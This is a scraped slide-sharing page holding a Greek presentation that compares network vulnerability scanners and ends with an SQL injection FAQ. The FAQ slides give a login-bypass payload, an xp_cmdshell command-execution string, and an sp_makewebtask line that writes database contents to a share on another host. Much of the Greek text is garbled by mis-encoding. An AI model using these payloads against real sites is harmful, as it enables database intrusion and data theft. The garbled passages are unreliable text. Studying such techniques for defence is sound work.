Tasos Vizaniaris, profile picture
Uploaded byTasos Vizaniaris
PPTX, PDF295 views

Asfask1

Embed presentation

Download to read offline
ΟΝΟΜΑ ΚΟ΢ΣΟ΢ ΠΛΑΣΦΟΡΜΑ ΔΙΚΣΤΑΚΟ΢ ΣΟΠΟ΢ Acunetix Web Free edition + Windows http://www.acunetix.com/ Scanner 3 not free eEye – Retina 32 IP - $575.00 Windows http://www.eeye.com/home GFI LANguard 10-24 IP-$320.00 Windows http://www.gfi.com/ ISS Internet 10 dev – $1500.00 Windows http://www.iss.net/products/Internet_Scann Scanner er/product_main_page.html LanSpy Free Windows http://lantricks.com/lanspy/ Nessus $1200.00 Windows http://www.tenable.com/products/nessus Nikto Free Unix / Linux http://cirt.net/nikto2 Nmap Free Windows / Linux / http://nmap.org/ Mac / FreeBSD /… SARA (Security Free Unix, Linux, MAC http://www-arc.com/sara/ Auditor's Research OS/X / Windows Assistant) SATAN (Security Free Unix http://www.porcupine.org/satan/ Administration Tool for Analyzing Networks)
Περιγραφή κάποιων δυνατοτήτων του κάθε εργαλείου Acunetix Web Scanner • Ελζγχει τισ web εφαρμογζσ για XSS, SQL Injection και άλλεσ ευπάκειεσ • Ελζγχει τισ web εφαρμογζσ ςασ για κωδικοποίθμζνα λάκθ που οδθγοφν ςε Cross Site Scripting ευπάκειεσ • Το Acunetix κάνει επίςθσ ελζγχουσ και για άλλεσ ευπάκειεσ ςε δθμοφιλείσ εφαρμογζσ web, όπωσ το Joomla, το phpBB • Εντοπίηει αρχεία με XSS ευπάκειεσ επιτρζποντασ ςασ να τα διορκϊςετε πρίν τα εντοπίςει ο χάκερ eEye – Retina • Ανακάλυψθ και ςάρωςθ όλων των περιουςιακϊν ςτοιχείων τθσ υποδομισ του δικτφου - εξ αποςτάςεωσ, εικονικϊν, και των τοπικϊν • Μθ παρεμβατικι ςάρωςθ τθσ μθχανισ για τθ βελτιςτοποίθςθ τθσ απόδοςθσ του δικτφου και ςάρωςθ ςυςκευϊν δικτφου, λειτουργικϊν ςυςτθμάτων, εφαρμογϊν και βάςεων δεδομζνων • Ιεράρχθςθ των ευπακειϊν για τθν επιτάχυνςθ τθσ διαδικαςίασ • Πλιρθσ βάςθ δεδομζνων με τισ γνωςτζσ ευπάκειεσ, θ οποία ενθμερϊνεται ςυνεχϊσ από τθν διάςθμοερευνθτικι ομάδα eEye GFI LANguard • Ζλεγχοσ του λογιςμικοφ και του δικτφου • Ζκτίμθςθ τθσ ευπάκειασ • Αυτόματθ αποκατάςταςθ των μθ εξουςιοδοτθμζνων εφαρμογϊν • Απομακρυςμζνθ ςφνδεςθ επιφάνειασ εργαςίασ • Εκτεταμζνθ βάςθ δεδομζνων ευπακειϊν • Σάρωςθ και ανάκτθςθ δεδομζνων από το λειτουργικό ςφςτθμα Linux • Αυτόματοσ ζλζγχοσ τθσ πολιτικισ κωδικοφ πρόςβαςθσ για όλα τα μθχανιματα ςτο δίκτυο
ISS Internet Scanner • Εκτελεί τακτικζσ και επιλεκτικζσ ανιχνεφςεισ των υπθρεςιϊν επικοινωνίασ, λειτουργικϊν ςυςτθμάτων, εφαρμογϊν και δρομολογθτϊν για να αποκαλφψει και να αναφζρει ευπάκειεσ ςυςτιματοσ που κα μποροφςαν να είναι ανοικτά ςτθν επίκεςθ • Ζνα αξιοπρεπζσ scanner με μια μικρι αδυναμία: δεν υπάρχει υποςτιριξθ για Windows Server 2003 • Εξαιρετικοί ελζγχοι κεμάτων ευπάκειασ, εφκολθ διαμόρφωςθ, καλι αναφορά LanSpy • Ζλεγχοσ του δικτφου ςασ για κζματα αςφάλειασ • Προβολι διαδικαςιϊν ςε απομακρυςμζνουσ υπολογιςτζσ • Εμφάνιςθ λίςτασ των εγκατεςτθμζνων εφαρμογϊν ςε ςτακμοφσ εργαςίασ • Εντοπιςμόσ share, να ανοίξει τα port και τουσ λογαριαςμοφσ χρθςτϊν Nessus • Είναι αρκετά αξιόπιςτο μεταξφ των ενεργϊν ςαρωτϊν με περιςςότερα από πζντε εκατομμφρια downloads μζχρι ςιμερα • Διακζτει γριγορθ ανακάλυψθ των ςφαλμάτων, ζλεγχο διαμόρφωςθσ, ανακάλυψθ και ανάλυςθ ευπάκειασ τθσ ςτάςθσ του ςϊματοσ αςφαλείασ ςασ • Οι Nessus ςαρωτζσ μποροφν να διανζμονται ςε μια ολόκλθρθ επιχείρθςθ, μζςα ςε DMZs και ςε όλα τα φυςικά δίκτυα Nikto • SSL και πλιρθσ HTTP proxy υποςτιριξθ • Ζλεγχοι για ξεπεραςμζνα ςτοιχεία διακομιςτι • Αποκθκεφει τισ αναφορζσ ςε μορφι απλοφ κειμζνου, XML, HTML, NBE ι CSV • Προςδιορίηει το εγκατεςτθμζνο λογιςμικό μζςω favicons κεφαλίδεσ και αρχεία • Σαρϊνει πολλζσ κφρεσ ςε ζνα διακομιςτι, ι πολλοφσ διακομιςτζσ μζςω του αρχείου ειςόδου
Nmap • Ευζλικτο: Υποςτθρίηει τισ δωδεκάδεσ των προθγμζνων τεχνικϊν για τθ χαρτογράφθςθ από δίκτυα IP που γεμίηουν με τα φίλτρα, firewalls, routers, και άλλα εμπόδια • Ιςχυρό: ζχει χρθςιμοποιθκεί για τθ ςάρωςθ ςε τεράςτια δίκτυα, κυριολεκτικά εκατοντάδεσ χιλιάδεσ μθχανιματα • Φορθτό: Τα περιςςότερα λειτουργικά ςυςτιματα που υποςτθρίηονται, ςυμπεριλαμβανομζνου του Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris,IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, και πολλά άλλα • Εφκολο: προςφζρει ζνα πλοφςιο ςφνολο από προθγμζνα χαρακτθριςτικά για τουσ χριςτεσ, μπορείτε να αρχίςετε όςο πιο απλά ςαν "nmap-v-Atargethost" • Υποςτθριηόμενο: ζρχεται χωρίσ καμμιά εγγφθςθ, είναι καλά υποςτθριηόμενο από μια ηωντανι κοινότθτα προγραμματιςτϊν και χρθςτϊν SARA (Security Auditor's Research Assistant) • Λειτουργεί κάτω από το Unix, Linux, Mac OS / X ι Windows (μζςω colinux) »OS • Ενςωματϊνει τθν εκνικι βάςθ δεδομζνων ευπάκειασ (NVD) • Εκτελεί δοκιμζσ SQL injection • Εκτελεί εξαντλθτικζσ δοκιμζσ XSS • Μπορεί να προςαρμόηεται ςε πολλά περιβάλλοντα με τοίχο προςταςίασ SATAN (Security Administration Tool for Analyzing Networks) • Είναι ζνα εργαλείο για να βοθκιςει τουσ διαχειριςτζσ ςυςτθμάτων • Αναγνωρίηει πολλά κοινά προβλιματα δικτφωςθσ που ςχετίηονται με τθν αςφάλεια, και τα εκκζτει χωρίσ ςτθν πραγματικότθτα να τα εκμεταλλεφονται • Για κάκε τφπο προβλιματοσ που βρζκθκε, προςφζρει ζνα φροντιςτιριο που εξθγεί το πρόβλθμα και τθν επίδραςι που κα μποροφςε να ζχει • Συλλζγει πλθροφορίεσ που είναι διακζςιμεσ ςε όλουσ τουσ χριςτεσ που ζχουν πρόςβαςθ ςτο δίκτυο
Σο Nessus πιςτεφω πωσ θα ήταν η προςωπική μου επιλογή, κφριοσ λόγοσ οτι το ζχουν χρηςιμοποιήςει αρκετοί χρήςτεσ και γενικότερα οι δυνατότητεσ που προςφζρει καλφπτουν ζνα οργανομζνο δίκτυο
Εγκατάςταςη LanSpy • Μπαίνοντασ ςτο http://lantricks.com/download/ κατεβάηουμε το LanSpy_Setup.exe • Ακολουκοφμε τθν διαδικαςία εγκατάςταςθσ
• Εκτελϊντασ το εμφανίηει το εξισ παράκυρο • Πατϊντασ το πράςινο βελάκι κάνει ανάλυςθ δικτφου • Εκεί μποροφμε να δοφμε και να ελζνξουμε τα πάντα
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Σι είναι SQL Injection attack Όπωσ μπορείτε να βρείτε και ςτο Wikipedia, μιλάμε για μία τεχνικι θ οποία εκκζτει αδυναμίεσ ςτθν αςφάλεια (security vulnerability exploit) μίασ βάςθσ δεδομζνων. Η ςυγκεκριμζνθ ‘τρφπα’ ζχει να κάνει με το τρόπο που φιλτράρονται οι χριςτεσ ι γιατί τα usernames δεν είναι strongly typed. Οι επικζςεισ αυτζσ είναι επίςθσ γνωςτζσ και ωσ SQL Insertion attacks. Μόλισ ο hacker αποκτιςει πρόςβαςθ, τότε μπορεί να εκτελζςει ότι query κζλει πάνω ςτθν βάςθ δεδομζνων. Συνεπϊσ και να τραβιξει ι να αλλάξει όποια πλθροφορία κζλει. SQL Injection FAQ Ε:Τι χρειάηεται κάποιοσ για να κάνει τθν παραπάνω επίκεςθ; Α:Απλά ζναν web browser. Ε:Τι πρζπει να ψάξει για να κάνει κάποιοσ τθ ςυγκεκριμζνθ επίκεςθ; Α:Σελίδεσ που επιτρζπουν τθν ειςαγωγι δεδομζνων όπωσ login page, search page, feedback κλπ. Μερικζσ φορζσ ακόμα και HTML ςελίδεσ χρθςιμοποιοφν POST εντολζσ για να ςτείλουν τισ ςχετικζσ παραμζτρουσ ςε κάποια ςελίδα ASP. Οπότε ςε αυτι τθν περίπτωςθ δεν κα δείτε τισ παραμζτρουσ αυτζσ ςτθν URL, αλλά μόνο αν ελζγξετε τον source code και ψάξετε και βρείτε το ςθμείο “FORM” μζςα ςτον κϊδικα πχ <FORM action=Search/search.asp method=post> <input type=hidden name=A value=C> </FORM> Οτιδιποτε υπάρχει μεταξφ FORM & /FORM είναι πικανζσ παράμετροι που κα μπορεί κάποιοσ να χρθςιμοποιιςει. Ε:Τι γίνεται αν δεν βρίςκουμε ςελίδα που να δζχεται ειςαγωγι δεδομζνων; A:Θα πρζπει να ψάξετε ςελίδα ASP, JSP, CGI ι PHP. Αυτό που κα πρζπει να ψάχνει κάποιοσ είναι ςελίδεσ όπωσ: http://autoexec.gr/index.asp?id=10
E:Πωσ κα δοκιμάςουμε αν υπάρχει ‘τρφπα’ A:Δοκιμάςτε να γράψετε hi' or 1=1-- αυτό μπορεί να είναι ςτο Login, ςτο Password ι ακόμα και τθν URL πχ http://autoexec.gr/index.asp?id=hi' or 1=1— E:Μπορϊ να αποκτιςω δυνατότθτα απομακρυςμζνθ εκτζλεςθσ με SQL Injection; Α:Οι χριςτεσ SQL και δθ οι developers, γνωρίηουν ότι ο SQL είναι ζνα πολφ δυνατό εργαλείο και αυτό γιατί τουσ δίνει τθν δυνατότθτα να κάνουν ΤΑ ΠΑΝΤΑ ςε ζνα ςφςτθμα. Ζτςι, επειδι ο SQL Server τρζχει ςαν SYSTEM, αυτό ςθμαίνει ότι τα δικαιϊματα που ζχει είναι επιπζδου administrator ςτο ςφςτθμα. Οπότε εφκολα από τθν ςτιγμι που μποροφμε να τρζξουμε ότι κζλουμε, με τθν χριςθ stored procedures (που είςαι Αντϊνθ;) '; exec master..xp_cdmshel ‘ping 10.10.1.2'-- Σε περίπτωςθ που το μονό quote δεν δουλεφει, χρθςιμοποιιςτε διπλό. Το ερωτθματικό ςτθν αρχι (θ semi colon όπωσ το λζνε ςτα ξζνα) κα τερματίςει το SQL query που εκτελείται εκείνθ τθν ϊρα και κα μασ επιτρζψει να ξεκινιςουμε μία νζα εντολι SQL. Για τθν επιβεβαίωςθ ότι θ εντολι εκτελζςτθκε ςωςτά μποροφμε να πάρουμε απάντθςθ από ping ςτθν IP για να δοφμε αν υπάρχει κάποιο πακζτο από τον server: #tcpdump icmp Αν δεν πάρουμε απάντθςθ από το Ping (που λζγετε Pong), και ζχουμε μινυμα λάκουσ που ςχετίηεται με δικαιϊματα, τότε πικανόν ο administrator ζχει περιορίςει τθν εκτζλεςθ των stored procedures ςτον Web User. E:Πωσ μπορϊ να πάρω το αποτζλεςμα του query μου; Α:Με τθν χριςθ του sp_makewebtask: '; EXEC master..sp_makewebtask "10.10.1.3shareoutput.html", "SELECT * FROM INFORMATION_SCHEMAS.TABLES" αλλά να ζχετε υπόψθ ότι ο φάκελοσ SHARE που κα βρίςκεται ςτθν IP που κζλουμε πρζπει να ζχει sharing pemissions ςε Everyone.

More Related Content

PPT
Camilpetrescu
byoanaelenaifrim
 
PPTX
تفسير جديد لسورة المرسلات ... د نبيل أكبر
byNabil Akbar
 
PPSX
Muppets love 2012
bymcpaez
 
DOCX
Teatre
byPauulaGuuti
 
PDF
Socialmediabosschrisbroganhubspot 090422210253 Phpapp02
byRush Bhana.com
 
PPTX
تفسير جديد لسورة الصافات
byNabil Akbar
 
PPSX
Muppets love 2012
bymcpaez
 
PPTX
GEN092 presentation (10-25-11)
byILiCLibrary
 
Camilpetrescu
byoanaelenaifrim
 
تفسير جديد لسورة المرسلات ... د نبيل أكبر
byNabil Akbar
 
Muppets love 2012
bymcpaez
 
Teatre
byPauulaGuuti
 
Socialmediabosschrisbroganhubspot 090422210253 Phpapp02
byRush Bhana.com
 
تفسير جديد لسورة الصافات
byNabil Akbar
 
Muppets love 2012
bymcpaez
 
GEN092 presentation (10-25-11)
byILiCLibrary
 

Similar to Asfask1

PPTX
1st StudentGuru Live Meeting | Imagine Cup 2011 | IT Challenge Support
byAlexandros Sigaras
 
PPTX
SQL Injection
byMarios Siganos
 
PPT
Anti Virus
byAthanasia Papachristou
 
PPT
Δικανική Υπολογιστών και Δικτύων (Computer and Network Forensics )
byKostisFardelas
 
PDF
φυλλάδιο Intermapper
byDr Dimitrios Thanassas
 
PPTX
01p intermapper
byDr Dimitrios Thanassas
 
PDF
Format/VM WARE/OS's Tutorial
byEvangelos Gkikopoulos
 
PPT
διαδικτυο και γονεις(αυτο)
by10odskaterinis1
 
PDF
Thesis.Net Features
byMGAKIS
 
PPTX
παρουσίαση10
byloizvla
 
PPTX
Εφαρμογές Υπολογιστών - Δίκτυα - Κεφάλαιο 12
bypppetros
 
PPTX
Kourvoulis ptyxiaki
bygkourv
 
PPTX
Hacking στις μέρες
byxpapas
 
PPTX
Hacking στις μέρες
byxpapas
 
PPT
προστασίαλογισμικούιοί
bymgiota
 
PDF
Διαδίκτυο και θεματα ιντερνετ γενικοτερα
byEugenia765930
 
PPTX
Νομικά και Πληροφορική: Μηχανισμοί συνδρομής δικονομικής διαδικασίας
byDimitris Katsiadramis
 
PPTX
παρουσίαση1
byloizvla
 
PDF
Κακόβουλο Λογισμικό
byfilippos_chatziandreas
 
PPTX
SNORT IDS Use Case - Συστήματα προσδιορισμού εισβολέων ανοιχτού κώδικα
byAngelos Alevizopoulos
 
1st StudentGuru Live Meeting | Imagine Cup 2011 | IT Challenge Support
byAlexandros Sigaras
 
SQL Injection
byMarios Siganos
 
Anti Virus
byAthanasia Papachristou
 
Δικανική Υπολογιστών και Δικτύων (Computer and Network Forensics )
byKostisFardelas
 
φυλλάδιο Intermapper
byDr Dimitrios Thanassas
 
01p intermapper
byDr Dimitrios Thanassas
 
Format/VM WARE/OS's Tutorial
byEvangelos Gkikopoulos
 
διαδικτυο και γονεις(αυτο)
by10odskaterinis1
 
Thesis.Net Features
byMGAKIS
 
παρουσίαση10
byloizvla
 
Εφαρμογές Υπολογιστών - Δίκτυα - Κεφάλαιο 12
bypppetros
 
Kourvoulis ptyxiaki
bygkourv
 
Hacking στις μέρες
byxpapas
 
Hacking στις μέρες
byxpapas
 
προστασίαλογισμικούιοί
bymgiota
 
Διαδίκτυο και θεματα ιντερνετ γενικοτερα
byEugenia765930
 
Νομικά και Πληροφορική: Μηχανισμοί συνδρομής δικονομικής διαδικασίας
byDimitris Katsiadramis
 
παρουσίαση1
byloizvla
 
Κακόβουλο Λογισμικό
byfilippos_chatziandreas
 
SNORT IDS Use Case - Συστήματα προσδιορισμού εισβολέων ανοιχτού κώδικα
byAngelos Alevizopoulos
 

Asfask1

  • 1.
    ΟΝΟΜΑ ΚΟ΢ΣΟ΢ ΠΛΑΣΦΟΡΜΑ ΔΙΚΣΤΑΚΟ΢ ΣΟΠΟ΢ Acunetix Web Free edition + Windows http://www.acunetix.com/ Scanner 3 not free eEye – Retina 32 IP - $575.00 Windows http://www.eeye.com/home GFI LANguard 10-24 IP-$320.00 Windows http://www.gfi.com/ ISS Internet 10 dev – $1500.00 Windows http://www.iss.net/products/Internet_Scann Scanner er/product_main_page.html LanSpy Free Windows http://lantricks.com/lanspy/ Nessus $1200.00 Windows http://www.tenable.com/products/nessus Nikto Free Unix / Linux http://cirt.net/nikto2 Nmap Free Windows / Linux / http://nmap.org/ Mac / FreeBSD /… SARA (Security Free Unix, Linux, MAC http://www-arc.com/sara/ Auditor's Research OS/X / Windows Assistant) SATAN (Security Free Unix http://www.porcupine.org/satan/ Administration Tool for Analyzing Networks)
  • 2.
    Περιγραφή κάποιων δυνατοτήτωντου κάθε εργαλείου Acunetix Web Scanner • Ελζγχει τισ web εφαρμογζσ για XSS, SQL Injection και άλλεσ ευπάκειεσ • Ελζγχει τισ web εφαρμογζσ ςασ για κωδικοποίθμζνα λάκθ που οδθγοφν ςε Cross Site Scripting ευπάκειεσ • Το Acunetix κάνει επίςθσ ελζγχουσ και για άλλεσ ευπάκειεσ ςε δθμοφιλείσ εφαρμογζσ web, όπωσ το Joomla, το phpBB • Εντοπίηει αρχεία με XSS ευπάκειεσ επιτρζποντασ ςασ να τα διορκϊςετε πρίν τα εντοπίςει ο χάκερ eEye – Retina • Ανακάλυψθ και ςάρωςθ όλων των περιουςιακϊν ςτοιχείων τθσ υποδομισ του δικτφου - εξ αποςτάςεωσ, εικονικϊν, και των τοπικϊν • Μθ παρεμβατικι ςάρωςθ τθσ μθχανισ για τθ βελτιςτοποίθςθ τθσ απόδοςθσ του δικτφου και ςάρωςθ ςυςκευϊν δικτφου, λειτουργικϊν ςυςτθμάτων, εφαρμογϊν και βάςεων δεδομζνων • Ιεράρχθςθ των ευπακειϊν για τθν επιτάχυνςθ τθσ διαδικαςίασ • Πλιρθσ βάςθ δεδομζνων με τισ γνωςτζσ ευπάκειεσ, θ οποία ενθμερϊνεται ςυνεχϊσ από τθν διάςθμοερευνθτικι ομάδα eEye GFI LANguard • Ζλεγχοσ του λογιςμικοφ και του δικτφου • Ζκτίμθςθ τθσ ευπάκειασ • Αυτόματθ αποκατάςταςθ των μθ εξουςιοδοτθμζνων εφαρμογϊν • Απομακρυςμζνθ ςφνδεςθ επιφάνειασ εργαςίασ • Εκτεταμζνθ βάςθ δεδομζνων ευπακειϊν • Σάρωςθ και ανάκτθςθ δεδομζνων από το λειτουργικό ςφςτθμα Linux • Αυτόματοσ ζλζγχοσ τθσ πολιτικισ κωδικοφ πρόςβαςθσ για όλα τα μθχανιματα ςτο δίκτυο
  • 3.
    ISS Internet Scanner • Εκτελεί τακτικζσ και επιλεκτικζσ ανιχνεφςεισ των υπθρεςιϊν επικοινωνίασ, λειτουργικϊν ςυςτθμάτων, εφαρμογϊν και δρομολογθτϊν για να αποκαλφψει και να αναφζρει ευπάκειεσ ςυςτιματοσ που κα μποροφςαν να είναι ανοικτά ςτθν επίκεςθ • Ζνα αξιοπρεπζσ scanner με μια μικρι αδυναμία: δεν υπάρχει υποςτιριξθ για Windows Server 2003 • Εξαιρετικοί ελζγχοι κεμάτων ευπάκειασ, εφκολθ διαμόρφωςθ, καλι αναφορά LanSpy • Ζλεγχοσ του δικτφου ςασ για κζματα αςφάλειασ • Προβολι διαδικαςιϊν ςε απομακρυςμζνουσ υπολογιςτζσ • Εμφάνιςθ λίςτασ των εγκατεςτθμζνων εφαρμογϊν ςε ςτακμοφσ εργαςίασ • Εντοπιςμόσ share, να ανοίξει τα port και τουσ λογαριαςμοφσ χρθςτϊν Nessus • Είναι αρκετά αξιόπιςτο μεταξφ των ενεργϊν ςαρωτϊν με περιςςότερα από πζντε εκατομμφρια downloads μζχρι ςιμερα • Διακζτει γριγορθ ανακάλυψθ των ςφαλμάτων, ζλεγχο διαμόρφωςθσ, ανακάλυψθ και ανάλυςθ ευπάκειασ τθσ ςτάςθσ του ςϊματοσ αςφαλείασ ςασ • Οι Nessus ςαρωτζσ μποροφν να διανζμονται ςε μια ολόκλθρθ επιχείρθςθ, μζςα ςε DMZs και ςε όλα τα φυςικά δίκτυα Nikto • SSL και πλιρθσ HTTP proxy υποςτιριξθ • Ζλεγχοι για ξεπεραςμζνα ςτοιχεία διακομιςτι • Αποκθκεφει τισ αναφορζσ ςε μορφι απλοφ κειμζνου, XML, HTML, NBE ι CSV • Προςδιορίηει το εγκατεςτθμζνο λογιςμικό μζςω favicons κεφαλίδεσ και αρχεία • Σαρϊνει πολλζσ κφρεσ ςε ζνα διακομιςτι, ι πολλοφσ διακομιςτζσ μζςω του αρχείου ειςόδου
  • 4.
    Nmap • Ευζλικτο: Υποςτθρίηει τισ δωδεκάδεσ των προθγμζνων τεχνικϊν για τθ χαρτογράφθςθ από δίκτυα IP που γεμίηουν με τα φίλτρα, firewalls, routers, και άλλα εμπόδια • Ιςχυρό: ζχει χρθςιμοποιθκεί για τθ ςάρωςθ ςε τεράςτια δίκτυα, κυριολεκτικά εκατοντάδεσ χιλιάδεσ μθχανιματα • Φορθτό: Τα περιςςότερα λειτουργικά ςυςτιματα που υποςτθρίηονται, ςυμπεριλαμβανομζνου του Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris,IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, και πολλά άλλα • Εφκολο: προςφζρει ζνα πλοφςιο ςφνολο από προθγμζνα χαρακτθριςτικά για τουσ χριςτεσ, μπορείτε να αρχίςετε όςο πιο απλά ςαν "nmap-v-Atargethost" • Υποςτθριηόμενο: ζρχεται χωρίσ καμμιά εγγφθςθ, είναι καλά υποςτθριηόμενο από μια ηωντανι κοινότθτα προγραμματιςτϊν και χρθςτϊν SARA (Security Auditor's Research Assistant) • Λειτουργεί κάτω από το Unix, Linux, Mac OS / X ι Windows (μζςω colinux) »OS • Ενςωματϊνει τθν εκνικι βάςθ δεδομζνων ευπάκειασ (NVD) • Εκτελεί δοκιμζσ SQL injection • Εκτελεί εξαντλθτικζσ δοκιμζσ XSS • Μπορεί να προςαρμόηεται ςε πολλά περιβάλλοντα με τοίχο προςταςίασ SATAN (Security Administration Tool for Analyzing Networks) • Είναι ζνα εργαλείο για να βοθκιςει τουσ διαχειριςτζσ ςυςτθμάτων • Αναγνωρίηει πολλά κοινά προβλιματα δικτφωςθσ που ςχετίηονται με τθν αςφάλεια, και τα εκκζτει χωρίσ ςτθν πραγματικότθτα να τα εκμεταλλεφονται • Για κάκε τφπο προβλιματοσ που βρζκθκε, προςφζρει ζνα φροντιςτιριο που εξθγεί το πρόβλθμα και τθν επίδραςι που κα μποροφςε να ζχει • Συλλζγει πλθροφορίεσ που είναι διακζςιμεσ ςε όλουσ τουσ χριςτεσ που ζχουν πρόςβαςθ ςτο δίκτυο
  • 5.
    Σο Nessus πιςτεφωπωσ θα ήταν η προςωπική μου επιλογή, κφριοσ λόγοσ οτι το ζχουν χρηςιμοποιήςει αρκετοί χρήςτεσ και γενικότερα οι δυνατότητεσ που προςφζρει καλφπτουν ζνα οργανομζνο δίκτυο
  • 6.
    Εγκατάςταςη LanSpy • Μπαίνοντασ ςτο http://lantricks.com/download/ κατεβάηουμε το LanSpy_Setup.exe • Ακολουκοφμε τθν διαδικαςία εγκατάςταςθσ
  • 7.
    Εκτελϊντασ το εμφανίηει το εξισ παράκυρο • Πατϊντασ το πράςινο βελάκι κάνει ανάλυςθ δικτφου • Εκεί μποροφμε να δοφμε και να ελζνξουμε τα πάντα
  • 8.
    CWE-89: Improper Neutralizationof Special Elements used in an SQL Command ('SQL Injection') Σι είναι SQL Injection attack Όπωσ μπορείτε να βρείτε και ςτο Wikipedia, μιλάμε για μία τεχνικι θ οποία εκκζτει αδυναμίεσ ςτθν αςφάλεια (security vulnerability exploit) μίασ βάςθσ δεδομζνων. Η ςυγκεκριμζνθ ‘τρφπα’ ζχει να κάνει με το τρόπο που φιλτράρονται οι χριςτεσ ι γιατί τα usernames δεν είναι strongly typed. Οι επικζςεισ αυτζσ είναι επίςθσ γνωςτζσ και ωσ SQL Insertion attacks. Μόλισ ο hacker αποκτιςει πρόςβαςθ, τότε μπορεί να εκτελζςει ότι query κζλει πάνω ςτθν βάςθ δεδομζνων. Συνεπϊσ και να τραβιξει ι να αλλάξει όποια πλθροφορία κζλει. SQL Injection FAQ Ε:Τι χρειάηεται κάποιοσ για να κάνει τθν παραπάνω επίκεςθ; Α:Απλά ζναν web browser. Ε:Τι πρζπει να ψάξει για να κάνει κάποιοσ τθ ςυγκεκριμζνθ επίκεςθ; Α:Σελίδεσ που επιτρζπουν τθν ειςαγωγι δεδομζνων όπωσ login page, search page, feedback κλπ. Μερικζσ φορζσ ακόμα και HTML ςελίδεσ χρθςιμοποιοφν POST εντολζσ για να ςτείλουν τισ ςχετικζσ παραμζτρουσ ςε κάποια ςελίδα ASP. Οπότε ςε αυτι τθν περίπτωςθ δεν κα δείτε τισ παραμζτρουσ αυτζσ ςτθν URL, αλλά μόνο αν ελζγξετε τον source code και ψάξετε και βρείτε το ςθμείο “FORM” μζςα ςτον κϊδικα πχ <FORM action=Search/search.asp method=post> <input type=hidden name=A value=C> </FORM> Οτιδιποτε υπάρχει μεταξφ FORM & /FORM είναι πικανζσ παράμετροι που κα μπορεί κάποιοσ να χρθςιμοποιιςει. Ε:Τι γίνεται αν δεν βρίςκουμε ςελίδα που να δζχεται ειςαγωγι δεδομζνων; A:Θα πρζπει να ψάξετε ςελίδα ASP, JSP, CGI ι PHP. Αυτό που κα πρζπει να ψάχνει κάποιοσ είναι ςελίδεσ όπωσ: http://autoexec.gr/index.asp?id=10
  • 9.
    E:Πωσ κα δοκιμάςουμεαν υπάρχει ‘τρφπα’ A:Δοκιμάςτε να γράψετε hi' or 1=1-- αυτό μπορεί να είναι ςτο Login, ςτο Password ι ακόμα και τθν URL πχ http://autoexec.gr/index.asp?id=hi' or 1=1— E:Μπορϊ να αποκτιςω δυνατότθτα απομακρυςμζνθ εκτζλεςθσ με SQL Injection; Α:Οι χριςτεσ SQL και δθ οι developers, γνωρίηουν ότι ο SQL είναι ζνα πολφ δυνατό εργαλείο και αυτό γιατί τουσ δίνει τθν δυνατότθτα να κάνουν ΤΑ ΠΑΝΤΑ ςε ζνα ςφςτθμα. Ζτςι, επειδι ο SQL Server τρζχει ςαν SYSTEM, αυτό ςθμαίνει ότι τα δικαιϊματα που ζχει είναι επιπζδου administrator ςτο ςφςτθμα. Οπότε εφκολα από τθν ςτιγμι που μποροφμε να τρζξουμε ότι κζλουμε, με τθν χριςθ stored procedures (που είςαι Αντϊνθ;) '; exec master..xp_cdmshel ‘ping 10.10.1.2'-- Σε περίπτωςθ που το μονό quote δεν δουλεφει, χρθςιμοποιιςτε διπλό. Το ερωτθματικό ςτθν αρχι (θ semi colon όπωσ το λζνε ςτα ξζνα) κα τερματίςει το SQL query που εκτελείται εκείνθ τθν ϊρα και κα μασ επιτρζψει να ξεκινιςουμε μία νζα εντολι SQL. Για τθν επιβεβαίωςθ ότι θ εντολι εκτελζςτθκε ςωςτά μποροφμε να πάρουμε απάντθςθ από ping ςτθν IP για να δοφμε αν υπάρχει κάποιο πακζτο από τον server: #tcpdump icmp Αν δεν πάρουμε απάντθςθ από το Ping (που λζγετε Pong), και ζχουμε μινυμα λάκουσ που ςχετίηεται με δικαιϊματα, τότε πικανόν ο administrator ζχει περιορίςει τθν εκτζλεςθ των stored procedures ςτον Web User. E:Πωσ μπορϊ να πάρω το αποτζλεςμα του query μου; Α:Με τθν χριςθ του sp_makewebtask: '; EXEC master..sp_makewebtask "10.10.1.3shareoutput.html", "SELECT * FROM INFORMATION_SCHEMAS.TABLES" αλλά να ζχετε υπόψθ ότι ο φάκελοσ SHARE που κα βρίςκεται ςτθν IP που κζλουμε πρζπει να ζχει sharing pemissions ςε Everyone.